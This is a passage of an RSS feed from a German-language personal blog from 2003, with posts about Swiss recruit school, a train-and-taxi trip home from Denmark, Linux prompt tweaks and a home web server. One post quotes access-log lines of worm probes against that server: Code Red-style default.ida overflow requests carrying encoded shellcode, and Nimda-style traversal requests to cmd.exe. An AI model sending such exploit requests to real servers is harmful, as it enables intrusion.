  13152.    <dc:creator>Andreas Jaggi</dc:creator>
  13153.    <creativeCommons:license></creativeCommons:license>
  13154.    <pubDate>Sun, 28 Sep 2003 19:21:00 +0200</pubDate>
  13155.    <category domain="">Misc</category>
  13156.    <description><![CDATA[Jede Menge Militärphotos und -videos von unserem Zug gibts <a href=""><b>hier</b></a>.
  13157. ]]></description>
  13158.    <content:encoded><![CDATA[Jede Menge Militärphotos und -videos von unserem Zug gibts <a href=""><b>hier</b></a>.
  13159. ]]></content:encoded>
  13160.  </item>
  13162.  <item>
  13163.    <title>15 min. (Ent)spannung</title>
  13164.    <link></link>
  13165.    <guid isPermaLink="true"></guid>
  13166.    <dc:creator>Andreas Jaggi</dc:creator>
  13167.    <creativeCommons:license></creativeCommons:license>
  13168.    <pubDate>Mon, 22 Sep 2003 12:16:00 +0200</pubDate>
  13169.    <category domain="">Misc</category>
  13170.    <description><![CDATA[<a href=""><b>Flashgame im Mysth-Stil</b></a> gefunden bei <a href=""><b></b></a>
  13171. ]]></description>
  13172.    <content:encoded><![CDATA[<a href=""><b>Flashgame im Mysth-Stil</b></a> gefunden bei <a href=""><b></b></a>
  13173. ]]></content:encoded>
  13174.  </item>
  13176.  <item>
  13177.    <title>Closed Air 03</title>
  13178.    <link></link>
  13179.    <guid isPermaLink="true"></guid>
  13180.    <dc:creator>Andreas Jaggi</dc:creator>
  13181.    <creativeCommons:license></creativeCommons:license>
  13182.    <pubDate>Sun, 21 Sep 2003 23:44:00 +0200</pubDate>
  13183.    <category domain="">Music</category>
  13184.    <description><![CDATA[Gestern war ich mit ein paar Kameraden ausm Militär <a href=""><b>hier</b></a> und es war voll geil!
  13185. ]]></description>
  13186.    <content:encoded><![CDATA[Gestern war ich mit ein paar Kameraden ausm Militär <a href=""><b>hier</b></a> und es war voll geil!
  13187. ]]></content:encoded>
  13188.  </item>
  13190.  <item>
  13191.    <title>Schneewittchen auf türkisch</title>
  13192.    <link></link>
  13193.    <guid isPermaLink="true"></guid>
  13194.    <dc:creator>Andreas Jaggi</dc:creator>
  13195.    <creativeCommons:license></creativeCommons:license>
  13196.    <pubDate>Sun, 14 Sep 2003 16:22:00 +0200</pubDate>
  13197.    <category domain="">Misc</category>
  13198.    <description><![CDATA[Damit hier wieder mal was neues steht: <a href=""><b>Schneewittchen auf türkisch</b></a>, geklaut bei <a href=""><b>vowe</b></a>.
  13199. ]]></description>
  13200.    <content:encoded><![CDATA[Damit hier wieder mal was neues steht: <a href=""><b>Schneewittchen auf türkisch</b></a>, geklaut bei <a href=""><b>vowe</b></a>.
  13201. ]]></content:encoded>
  13202.  </item>
  13204.  <item>
  13205.    <title>Grosser Urlaub</title>
  13206.    <link></link>
  13207.    <guid isPermaLink="true"></guid>
  13208.    <dc:creator>Andreas Jaggi</dc:creator>
  13209.    <creativeCommons:license></creativeCommons:license>
  13210.    <pubDate>Sun, 03 Aug 2003 02:46:00 +0200</pubDate>
  13211.    <category domain="">Misc</category>
  13212.    <description><![CDATA[So, 'grosser' Urlaub, vom 1.8. 13:30 bis 4.8. 23:45. Ich werde wohl wie schon letztes Wochenende die ganze Zeit schlafen.<br>Mein PC läuft seit dem letzten Samstag auch nur noch mit Knoppix, aber da <a href=""><b>Gentoo 1.4</b></a> erst am 5.8. rauskommt warte ich noch mit neuaufsetzen.<br><br>Wer Karten, Briefe oder Pakete erhalten will, soll sich melden, aber viel mehr als solche Sprüche sind nicht zu erwarten:<br><br>Wir marschieren über Felder<br>WIr marschieren über Saat<br>Wir verblöden organisiert<br>Und alles zahlt der Staat!<br><br>Ich kenn einen Ort, wo keine Sonne lacht<br>einen Ort wo man aus Menschen Maschinen macht<br>einen Ort ohne Moral und Tugend<br>die <abbr title="Rekrutenschule = Ausbildung zum Soldat">RS</abbr> das Grab deiner Jugend!
  13213. ]]></description>
  13214.    <content:encoded><![CDATA[So, 'grosser' Urlaub, vom 1.8. 13:30 bis 4.8. 23:45. Ich werde wohl wie schon letztes Wochenende die ganze Zeit schlafen.<br>Mein PC läuft seit dem letzten Samstag auch nur noch mit Knoppix, aber da <a href=""><b>Gentoo 1.4</b></a> erst am 5.8. rauskommt warte ich noch mit neuaufsetzen.<br><br>Wer Karten, Briefe oder Pakete erhalten will, soll sich melden, aber viel mehr als solche Sprüche sind nicht zu erwarten:<br><br>Wir marschieren über Felder<br>WIr marschieren über Saat<br>Wir verblöden organisiert<br>Und alles zahlt der Staat!<br><br>Ich kenn einen Ort, wo keine Sonne lacht<br>einen Ort wo man aus Menschen Maschinen macht<br>einen Ort ohne Moral und Tugend<br>die <abbr title="Rekrutenschule = Ausbildung zum Soldat">RS</abbr> das Grab deiner Jugend!
  13215. ]]></content:encoded>
  13216.  </item>
  13218.  <item>
  13219.    <title>FtS</title>
  13220.    <link></link>
  13221.    <guid isPermaLink="true"></guid>
  13222.    <dc:creator>Andreas Jaggi</dc:creator>
  13223.    <creativeCommons:license></creativeCommons:license>
  13224.    <pubDate>Sun, 20 Jul 2003 14:55:00 +0200</pubDate>
  13225.    <category domain="">Misc</category>
  13226.    <description><![CDATA[Nach einer Woche im Militär ist die Motivation schon fast in den Minusbereich gefallen, die weiteren 14 Wochen werden sicher lustig :-(<br>Wer die Motivation etwas steigern will, kann mir etwas zuschicken:<br><br>Rekr Jaggi Andreas<br>Kp III Zug 4<br>Uem RS 262<br>Kaserne<br>8302 Kloten<br><br>Bis 5 kg ist das Paket gratis (vermutlich nur in CH), sofern 'Feldpost' draufsteht.
  13227. ]]></description>
  13228.    <content:encoded><![CDATA[Nach einer Woche im Militär ist die Motivation schon fast in den Minusbereich gefallen, die weiteren 14 Wochen werden sicher lustig :-(<br>Wer die Motivation etwas steigern will, kann mir etwas zuschicken:<br><br>Rekr Jaggi Andreas<br>Kp III Zug 4<br>Uem RS 262<br>Kaserne<br>8302 Kloten<br><br>Bis 5 kg ist das Paket gratis (vermutlich nur in CH), sofern 'Feldpost' draufsteht.
  13229. ]]></content:encoded>
  13230.  </item>
  13232.  <item>
  13233.    <title>Bunt</title>
  13234.    <link></link>
  13235.    <guid isPermaLink="true"></guid>
  13236.    <dc:creator>Andreas Jaggi</dc:creator>
  13237.    <creativeCommons:license></creativeCommons:license>
  13238.    <pubDate>Sat, 12 Jul 2003 13:51:00 +0200</pubDate>
  13239.    <category domain="">Linux</category>
  13240.    <description><![CDATA[Zurück aus den Ferien, konnte ich endlich einmal wieder vor meinen Computer sitzen *g*<br><a href=""><b>Dieser Screenshot</b></a> zeigt, was dabei herausgekommen ist:<br><br>- Farbige Terminals <pre>aterm -tr -sh 75 -rv +sb -tint blue</pre>- Farbiger Prompt <pre>PS1='\[\033[1;30m\][ \[\033[01;32m\]\u\[\033[0;37m\] @ \[\033[01;32m\]\h \[\033[0;37m\]: \[\033[01;34m\]\w\[\033[1;30m\] ] \[\033[0;37m\]\$ \[\033[01;00m\]'</pre>- Farbiges ls <pre>alias ls="ls --color=auto"</pre>- Farbtabelle für die Shell: <a href=""><b>colors</b></a><br><br>- Informative Titelleisten <pre>PROMPT_COMMAND='echo -ne "\033]2;$USER@$HOSTNAME: $PWD ($_)\007"'</pre>
  13241. ]]></description>
  13242.    <content:encoded><![CDATA[Zurück aus den Ferien, konnte ich endlich einmal wieder vor meinen Computer sitzen *g*<br><a href=""><b>Dieser Screenshot</b></a> zeigt, was dabei herausgekommen ist:<br><br>- Farbige Terminals <pre>aterm -tr -sh 75 -rv +sb -tint blue</pre>- Farbiger Prompt <pre>PS1='\[\033[1;30m\][ \[\033[01;32m\]\u\[\033[0;37m\] @ \[\033[01;32m\]\h \[\033[0;37m\]: \[\033[01;34m\]\w\[\033[1;30m\] ] \[\033[0;37m\]\$ \[\033[01;00m\]'</pre>- Farbiges ls <pre>alias ls="ls --color=auto"</pre>- Farbtabelle für die Shell: <a href=""><b>colors</b></a><br><br>- Informative Titelleisten <pre>PROMPT_COMMAND='echo -ne "\033]2;$USER@$HOSTNAME: $PWD ($_)\007"'</pre>
  13243. ]]></content:encoded>
  13244.  </item>
  13246.  <item>
  13247.    <title>Ferien zum 2. und '3.' (RS), Zukunft</title>
  13248.    <link></link>
  13249.    <guid isPermaLink="true"></guid>
  13250.    <dc:creator>Andreas Jaggi</dc:creator>
  13251.    <creativeCommons:license></creativeCommons:license>
  13252.    <pubDate>Sat, 05 Jul 2003 00:12:00 +0200</pubDate>
  13253.    <category domain="">Misc</category>
  13254.    <description><![CDATA[Nachdem ich erst gerade aus Dänemark zurück bin, fahre ich in etwa 4 Stunden mit meiner Familie für eine Woche in die Ferien nach Brüssel. Gerade anschliessend beginnt dann die Rekrutenschule, welche am 24. Oktober endet. Am 20 Oktober beginnt das Studium an der <a href=""><b>EPFL</b></a>, verpasse ich also schon zum Anfang was :-(
  13255. ]]></description>
  13256.    <content:encoded><![CDATA[Nachdem ich erst gerade aus Dänemark zurück bin, fahre ich in etwa 4 Stunden mit meiner Familie für eine Woche in die Ferien nach Brüssel. Gerade anschliessend beginnt dann die Rekrutenschule, welche am 24. Oktober endet. Am 20 Oktober beginnt das Studium an der <a href=""><b>EPFL</b></a>, verpasse ich also schon zum Anfang was :-(
  13257. ]]></content:encoded>
  13258.  </item>
  13260.  <item>
  13261.    <title>Guide to GNU/Linux Desktop Survival</title>
  13262.    <link></link>
  13263.    <guid isPermaLink="true"></guid>
  13264.    <dc:creator>Andreas Jaggi</dc:creator>
  13265.    <creativeCommons:license></creativeCommons:license>
  13266.    <pubDate>Fri, 04 Jul 2003 11:03:00 +0200</pubDate>
  13267.    <category domain="">Linux</category>
  13268.    <description><![CDATA[Dank <a href=""><b>diesem reichhaltigen Guide</b></a> habe ich es wieder geschafft, meinen Drucker zum Laufen zu bringen, nachdem ich es, wegen der nicht gemachten Dokumentation vom letzten mal, nochnicht geschafft hatte.
  13269. ]]></description>
  13270.    <content:encoded><![CDATA[Dank <a href=""><b>diesem reichhaltigen Guide</b></a> habe ich es wieder geschafft, meinen Drucker zum Laufen zu bringen, nachdem ich es, wegen der nicht gemachten Dokumentation vom letzten mal, nochnicht geschafft hatte.
  13271. ]]></content:encoded>
  13272.  </item>
  13274.  <item>
  13275.    <title>back @ home</title>
  13276.    <link></link>
  13277.    <guid isPermaLink="true"></guid>
  13278.    <dc:creator>Andreas Jaggi</dc:creator>
  13279.    <creativeCommons:license></creativeCommons:license>
  13280.    <pubDate>Tue, 01 Jul 2003 23:10:00 +0200</pubDate>
  13281.    <category domain="">Misc</category>
  13282.    <description><![CDATA[So, ich bin zurück aus Dänemark. Es war schön und hatte sogar genügend Sonne, dass ich mir nen Sonnenbrand geholt habe.<br>Besonders die 21-stündige Rückreise war sehr abenteuerlich, da bei wirklich jedem Umsteigen alle Züge Verspätung hatten...
  13283. <br><br>
  13284. <img src="" width="300" height="300" alt="Karte von Dänemark und Deutschland"><br><br>Unsere Rückreise startete ganz normal mit einer einstündigen Busfahrt von Faaborg nach Odense (14.04 bis ca. 15.00). In Odense sollte unser Zug um 16.04 fahren, damit wir in Kollding in den IC nach Hamburg wechseln konnten.<br>Jedoch erfahren wir in Odense etwas vor 16 Uhr eher zufällig, dass der Zug nach Kollding so viel Verspätung hat, dass wir den IC nach Hamburg nicht mehr erreichen können. Unser erster Gedanke: Scheisse, nächster Zug erst in 24 Stunden.<br>Da aber noch andere Passagiere in dieser Situation waren, hat ein dänischer "Reiseleiter" (er begleitete zwei Jugendliche aus Ohaio an den Bahnhof) mit dem Bahnpersonal ausgehandelt, dass die Dänische Bahn ein Taxi bezahlt, das uns bis nach Kollding bringt, damit wir den IC nach Hamburg noch erreichen.<br>Gut, das Taxi kommt, mittlerweile ist es schon 16.22 und der IC in Kollding fährt um 16.47. Der Taxifahrer hat folgende Anweisung bekommen: 'Drive like hell!' und wir sind losgefahren.<br>Als wir erst um ungefähr 17 Uhr in der Nähe von Kollding sind, entscheidet der Taxifahrer, dass wir zur nächsten Station fahren, wo der IC hält, Flensburg (etwa 200km von Odense entfernt). Wir fahren nach Flensburg und haben dort etwa 10 Minuten vorsprung auf den Zug. Jedoch entscheidet der Taxifahrer weiterzufahren, da es vermutlich nicht möglich ist, in 10 Minuten von der Autobahn bis zum Bahnhof zu gelangen, und wenn wir dann dort wären und den Zug verpasst hätten, so müssten wir noch viel mehr Zeit aufholen.<br>Also rasen wir weiter, über die Grenze, wo der Taxifahrer feststellt, dass er das erste mal mit dem Taxi in Deutschland ist. Nächstes Ziel ist Hamburg (etwa 180 km von Flensburg entfernt). Dort würde unser nächster Zug (CityNightLiner nach Zürich) um 20.19 fahren.<br>Als wir auf Neumünster zufahren, haben wir 25 Minuten Vorsprung auf den Zug und der Taxifahrer entscheidet, hier zum Bahnhof zu fahren anstatt sich in Hamburg durch das städtische Verkehrschaos zu zwängen. Mittlerweile ist es fast 19 Uhr. Wir sind nun schon 3 Stunden Taxi gefahren, die Dänische Bahn wird sich sicher über die Rechnung freuen *bg*<br>Wir finden den Bahnhof ziemlich leicht und die Leute staunen nicht schlecht, als sie ein dänisches Taxi sehen *g*<br>Mit ein paar Minuten Verspätung fährt der dänische IC dann ein und wir steigen endlich in den Zug ein, in dem wir schon seit 2,5 Stunden sein sollten.<br>Mit einer kleinen Verspätung kommen wir in Hamburd-Dammtor an, was jedoch nicht weiter schlimm ist, da wir dort sowiese eine halbe Stunde Aufenthalt hätten.<br>Um 20.24 kommt der CityNightLiner mit 5 Minuten Verspätung, die sich noch vergrössern werden. Wir beziehen unsere Sleeperette (= Liegesessel) und freuen uns, dass wir uns endlich etwas erholen können :-)<br>Die Zugfahrt quer durch Deutschland verläuft wortwörtlich wie im Schlaf *g*<br>Als wir  jedoch am Morgen aufwachen kommt der Zug mit 20 Minuten Verspätung um 7.16 anstatt umd 6.56 in Basel an und wir verpassen unseren Zug, der um 7.04 gefahren ist.<br>Nach einer Stunde rumhängen im Bahnhof Basel, nehmen wir den Zug um 8.04 Richtung Bern, Thun, Spiez, Interlaken.<br>Um 9.58 steige ich in Spiez aus dem Zug aus und warte auf meinen Anschlusszug der um 10.02 fahren sollte. Als um 10.03 immernoch kein Zug da ist, höre ich die Durchsage: "Der Goldenpass Express nach Zweisimmen, planmässige Abfahrt 10.02 folgt in circa 5 Minuten"<br>Nach etwa 10 Minuten kommt der Zug und ich beginne auch die letzte Etape meiner Heimreise. In Zweisimmen komme ich schliesslich mit 15 Minuten Verspätung um 10.55 an, was mir jedoch nichts mehr ausmacht, da ich keine weiteren Anschlusszüge erreichen muss und nach 21 Stunden reisen sowieso nur noch in Bett fallen kann ;-)
  13285. ]]></description>
  13286.    <content:encoded><![CDATA[So, ich bin zurück aus Dänemark. Es war schön und hatte sogar genügend Sonne, dass ich mir nen Sonnenbrand geholt habe.<br>Besonders die 21-stündige Rückreise war sehr abenteuerlich, da bei wirklich jedem Umsteigen alle Züge Verspätung hatten...
  13287. <br><br>
  13288. <img src="" width="300" height="300" alt="Karte von Dänemark und Deutschland"><br><br>Unsere Rückreise startete ganz normal mit einer einstündigen Busfahrt von Faaborg nach Odense (14.04 bis ca. 15.00). In Odense sollte unser Zug um 16.04 fahren, damit wir in Kollding in den IC nach Hamburg wechseln konnten.<br>Jedoch erfahren wir in Odense etwas vor 16 Uhr eher zufällig, dass der Zug nach Kollding so viel Verspätung hat, dass wir den IC nach Hamburg nicht mehr erreichen können. Unser erster Gedanke: Scheisse, nächster Zug erst in 24 Stunden.<br>Da aber noch andere Passagiere in dieser Situation waren, hat ein dänischer "Reiseleiter" (er begleitete zwei Jugendliche aus Ohaio an den Bahnhof) mit dem Bahnpersonal ausgehandelt, dass die Dänische Bahn ein Taxi bezahlt, das uns bis nach Kollding bringt, damit wir den IC nach Hamburg noch erreichen.<br>Gut, das Taxi kommt, mittlerweile ist es schon 16.22 und der IC in Kollding fährt um 16.47. Der Taxifahrer hat folgende Anweisung bekommen: 'Drive like hell!' und wir sind losgefahren.<br>Als wir erst um ungefähr 17 Uhr in der Nähe von Kollding sind, entscheidet der Taxifahrer, dass wir zur nächsten Station fahren, wo der IC hält, Flensburg (etwa 200km von Odense entfernt). Wir fahren nach Flensburg und haben dort etwa 10 Minuten vorsprung auf den Zug. Jedoch entscheidet der Taxifahrer weiterzufahren, da es vermutlich nicht möglich ist, in 10 Minuten von der Autobahn bis zum Bahnhof zu gelangen, und wenn wir dann dort wären und den Zug verpasst hätten, so müssten wir noch viel mehr Zeit aufholen.<br>Also rasen wir weiter, über die Grenze, wo der Taxifahrer feststellt, dass er das erste mal mit dem Taxi in Deutschland ist. Nächstes Ziel ist Hamburg (etwa 180 km von Flensburg entfernt). Dort würde unser nächster Zug (CityNightLiner nach Zürich) um 20.19 fahren.<br>Als wir auf Neumünster zufahren, haben wir 25 Minuten Vorsprung auf den Zug und der Taxifahrer entscheidet, hier zum Bahnhof zu fahren anstatt sich in Hamburg durch das städtische Verkehrschaos zu zwängen. Mittlerweile ist es fast 19 Uhr. Wir sind nun schon 3 Stunden Taxi gefahren, die Dänische Bahn wird sich sicher über die Rechnung freuen *bg*<br>Wir finden den Bahnhof ziemlich leicht und die Leute staunen nicht schlecht, als sie ein dänisches Taxi sehen *g*<br>Mit ein paar Minuten Verspätung fährt der dänische IC dann ein und wir steigen endlich in den Zug ein, in dem wir schon seit 2,5 Stunden sein sollten.<br>Mit einer kleinen Verspätung kommen wir in Hamburd-Dammtor an, was jedoch nicht weiter schlimm ist, da wir dort sowiese eine halbe Stunde Aufenthalt hätten.<br>Um 20.24 kommt der CityNightLiner mit 5 Minuten Verspätung, die sich noch vergrössern werden. Wir beziehen unsere Sleeperette (= Liegesessel) und freuen uns, dass wir uns endlich etwas erholen können :-)<br>Die Zugfahrt quer durch Deutschland verläuft wortwörtlich wie im Schlaf *g*<br>Als wir  jedoch am Morgen aufwachen kommt der Zug mit 20 Minuten Verspätung um 7.16 anstatt umd 6.56 in Basel an und wir verpassen unseren Zug, der um 7.04 gefahren ist.<br>Nach einer Stunde rumhängen im Bahnhof Basel, nehmen wir den Zug um 8.04 Richtung Bern, Thun, Spiez, Interlaken.<br>Um 9.58 steige ich in Spiez aus dem Zug aus und warte auf meinen Anschlusszug der um 10.02 fahren sollte. Als um 10.03 immernoch kein Zug da ist, höre ich die Durchsage: "Der Goldenpass Express nach Zweisimmen, planmässige Abfahrt 10.02 folgt in circa 5 Minuten"<br>Nach etwa 10 Minuten kommt der Zug und ich beginne auch die letzte Etape meiner Heimreise. In Zweisimmen komme ich schliesslich mit 15 Minuten Verspätung um 10.55 an, was mir jedoch nichts mehr ausmacht, da ich keine weiteren Anschlusszüge erreichen muss und nach 21 Stunden reisen sowieso nur noch in Bett fallen kann ;-)
  13289. ]]></content:encoded>
  13290.  </item>
  13292.  <item>
  13293.    <title>Dänemark ich komme</title>
  13294.    <link></link>
  13295.    <guid isPermaLink="true"></guid>
  13296.    <dc:creator>Andreas Jaggi</dc:creator>
  13297.    <creativeCommons:license></creativeCommons:license>
  13298.    <pubDate>Fri, 20 Jun 2003 12:20:00 +0200</pubDate>
  13299.    <category domain="">Misc</category>
  13300.    <description><![CDATA[Wie gi <a href=";newsid=88"><b>neulich</b></a>, starte ich auch ne grosse Postkartenaktion *g*<br>Wer also ne Karte will, soll mir bis 14 Uhr seine Adresse mitteilen (die ohne http:// ;-)
  13301. ]]></description>
  13302.    <content:encoded><![CDATA[Wie gi <a href=";newsid=88"><b>neulich</b></a>, starte ich auch ne grosse Postkartenaktion *g*<br>Wer also ne Karte will, soll mir bis 14 Uhr seine Adresse mitteilen (die ohne http:// ;-)
  13303. ]]></content:encoded>
  13304.  </item>
  13306.  <item>
  13307.    <title>Maturareise</title>
  13308.    <link></link>
  13309.    <guid isPermaLink="true"></guid>
  13310.    <dc:creator>Andreas Jaggi</dc:creator>
  13311.    <creativeCommons:license></creativeCommons:license>
  13312.    <pubDate>Thu, 19 Jun 2003 22:24:00 +0200</pubDate>
  13313.    <category domain="">School</category>
  13314.    <description><![CDATA[Morgen um 16.18 Uhr fahre ich mit meiner Klasse nach Dänemark auf die Maturareise.<br>Ich melde mich dann im Juli wieder :-)
  13315. ]]></description>
  13316.    <content:encoded><![CDATA[Morgen um 16.18 Uhr fahre ich mit meiner Klasse nach Dänemark auf die Maturareise.<br>Ich melde mich dann im Juli wieder :-)
  13317. ]]></content:encoded>
  13318.  </item>
  13320.  <item>
  13321.    <title>dumdidum</title>
  13322.    <link></link>
  13323.    <guid isPermaLink="true"></guid>
  13324.    <dc:creator>Andreas Jaggi</dc:creator>
  13325.    <creativeCommons:license></creativeCommons:license>
  13326.    <pubDate>Mon, 16 Jun 2003 02:18:00 +0200</pubDate>
  13327.    <category domain="">Networking</category>
  13328.    <description><![CDATA[Da hab ich nun mit nem 486 nen superleisen 'Server' gebastelt und kaum den Apache installiert und alles eingerichtet, schon sieht's im accesslog so aus:<br><br>
  13329. - - [15/Jun/2003:17:58:38 +0200] "GET / HTTP/1.1" 200 71 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4b) Gecko/20030605 Mozilla Firebird/0.6"<br>(Mein erster Zugriff, davon hats natürlich noch n paar mehr *g*)
  13330. <br><br>
  13331. - - [15/Jun/2003:21:39:49 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 266 "-" "-"<br> - - [15/Jun/2003:23:24:03 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 266 "-" "-"<br> - - [15/Jun/2003:23:45:21 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 271 "-" "-"<br> - - [15/Jun/2003:23:45:21 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 269 "-" "-"<br> - - [15/Jun/2003:23:45:21 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-"<br> - - [15/Jun/2003:23:45:21 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-"<br> - - [15/Jun/2003:23:45:22 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"<br> - - [15/Jun/2003:23:45:22 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"<br> - - [15/Jun/2003:23:45:22 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"<br> - - [15/Jun/2003:23:45:25 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"<br> - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"<br> - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
  13332. <br> - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
  13333. <br> - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"<br> - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 276 "-" "-"<br> - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 276 "-" "-"<br> - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"<br> - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
  13334. ]]></description>
  13335.    <content:encoded><![CDATA[Da hab ich nun mit nem 486 nen superleisen 'Server' gebastelt und kaum den Apache installiert und alles eingerichtet, schon sieht's im accesslog so aus:<br><br>
  13336. - - [15/Jun/2003:17:58:38 +0200] "GET / HTTP/1.1" 200 71 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4b) Gecko/20030605 Mozilla Firebird/0.6"<br>(Mein erster Zugriff, davon hats natürlich noch n paar mehr *g*)
  13337. <br><br>
  13338. - - [15/Jun/2003:21:39:49 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 266 "-" "-"<br> - - [15/Jun/2003:23:24:03 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 266 "-" "-"<br> - - [15/Jun/2003:23:45:21 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 271 "-" "-"<br> - - [15/Jun/2003:23:45:21 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 269 "-" "-"<br> - - [15/Jun/2003:23:45:21 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-"<br> - - [15/Jun/2003:23:45:21 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-"<br> - - [15/Jun/2003:23:45:22 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"<br> - - [15/Jun/2003:23:45:22 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"<br> - - [15/Jun/2003:23:45:22 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"<br> - - [15/Jun/2003:23:45:25 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"<br> - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"<br> - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
  13339. <br> - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
  13340. <br> - - [15/Jun/2003:23:45:29 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"<br> - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 276 "-" "-"<br> - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 276 "-" "-"<br> - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"<br> - - [15/Jun/2003:23:45:30 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
  13341. ]]></content:encoded>
  13342.  </item>
